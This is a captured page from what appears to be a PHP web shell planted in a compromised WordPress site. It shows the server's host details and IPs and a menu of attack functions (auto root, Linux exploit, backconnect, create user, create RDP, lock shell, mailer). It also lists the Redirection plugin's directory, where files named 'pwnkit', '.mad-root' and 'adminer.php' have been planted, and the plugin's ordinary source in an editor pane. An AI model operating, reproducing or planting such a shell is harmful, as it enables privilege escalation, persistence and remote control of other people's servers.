Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
redirection /
[ HOME SHELL ]
Name
Size
Permission
Action
actions
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
fileio
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
matches
[ DIR ]
drwxr-xr-x
models
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
19.36
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
13.19
KB
-rw-r--r--
redirection-admin.php
25.24
KB
-rw-r--r--
redirection-capabilities.php
5.64
KB
-rw-r--r--
redirection-cli.php
11.34
KB
-rw-r--r--
redirection-front.php
3.02
KB
-rw-r--r--
redirection-settings.php
3.08
KB
-rw-r--r--
redirection-version.php
205
B
-rw-r--r--
redirection.php
4.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : redirection.php
<?php /* Plugin Name: Redirection Plugin URI: https://redirection.me/ Description: Manage all your 301 redirects and monitor 404 errors Version: 5.7.5 Author: John Godley Text Domain: redirection Requires PHP: 7.4 Requires at least: 6.5 ============================================================================================================ For full license details see license.txt ============================================================================================================ */ define( 'REDIRECTION_DB_VERSION', '4.2' ); // DB schema version. Only change if DB needs changing define( 'REDIRECTION_FILE', __FILE__ ); if ( ! defined( 'REDIRECTION_FLYING_SOLO' ) ) { define( 'REDIRECTION_FLYING_SOLO', apply_filters( 'redirection_flying_solo', true ) ); } // This file must support PHP < 7.4 so as not to crash if ( version_compare( PHP_VERSION, '7.4' ) < 0 ) { add_filter( 'plugin_action_links_' . basename( dirname( REDIRECTION_FILE ) ) . '/' . basename( REDIRECTION_FILE ), 'red_deprecated_php' ); /** * @param array<string> $links * @return array<string> */ function red_deprecated_php( array $links ): array { /* translators: 1: server PHP version. 2: required PHP version. */ array_unshift( $links, '<a href="https://redirection.me/support/problems/php-version/" style="color: red; text-decoration: underline">' . sprintf( __( 'Disabled! Detected PHP %1$s, need PHP %2$s+', 'redirection' ), phpversion(), '7.4' ) . '</a>' ); return $links; } return; } // TODO: remove this once version is stable if ( file_exists( __DIR__ . '/build/redirection-version.php' ) ) { require_once __DIR__ . '/build/redirection-version.php'; } else { define( 'REDIRECTION_VERSION', '5.7.5' ); define( 'REDIRECTION_BUILD', 'e5bead9293c415a3ea00b2af86bd2010' ); define( 'REDIRECTION_MIN_WP', '6.5' ); } require_once __DIR__ . '/redirection-settings.php'; require_once __DIR__ . '/models/options.php'; require_once __DIR__ . '/models/redirect/redirect.php'; require_once __DIR__ . '/models/url/url.php'; require_once __DIR__ . '/models/regex.php'; require_once __DIR__ . '/models/module.php'; require_once __DIR__ . '/models/log/log.php'; require_once __DIR__ . '/models/flusher.php'; require_once __DIR__ . '/models/match.php'; require_once __DIR__ . '/models/action.php'; require_once __DIR__ . '/models/request.php'; require_once __DIR__ . '/models/header.php'; require_once __DIR__ . '/models/group.php'; /** * Clear PHP opcache when plugin is updated. This is to help with mid-update errors. * * @param object $upgrader The upgrader object. * @param array{action: string, type: string, plugins?: string[]} $options The upgrade options. * @return void */ function redirection_clear_opcache_on_upgrade( $upgrader, $options ) { if ( $options['action'] !== 'update' || $options['type'] !== 'plugin' ) { return; } $plugin_basename = plugin_basename( REDIRECTION_FILE ); $plugins = $options['plugins'] ?? []; if ( ! in_array( $plugin_basename, $plugins, true ) ) { return; } if ( function_exists( 'opcache_reset' ) ) { // Suppress warnings if opcache_reset is restricted by server configuration @opcache_reset(); // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged } } add_action( 'upgrader_process_complete', 'redirection_clear_opcache_on_upgrade', 10, 2 ); /** * @return bool */ function red_is_wpcli() { if ( defined( 'WP_CLI' ) && WP_CLI ) { return true; } return false; } /** * @return bool */ function red_is_admin() { if ( is_admin() ) { return true; } return false; } /** * @return void */ function red_start_rest() { require_once __DIR__ . '/redirection-admin.php'; require_once __DIR__ . '/api/api.php'; Redirection_Api::init(); Redirection_Admin::init(); remove_action( 'rest_api_init', 'red_start_rest' ); } /** * @return void */ function redirection_locale() { load_plugin_textdomain( 'redirection', false, dirname( plugin_basename( REDIRECTION_FILE ) ) . '/locale/' ); } if ( red_is_admin() || red_is_wpcli() ) { require_once __DIR__ . '/redirection-admin.php'; require_once __DIR__ . '/api/api.php'; } else { require_once __DIR__ . '/redirection-front.php'; } if ( red_is_wpcli() ) { require_once __DIR__ . '/redirection-cli.php'; } add_action( 'rest_api_init', 'red_start_rest' ); add_action( 'init', 'redirection_locale' );
Close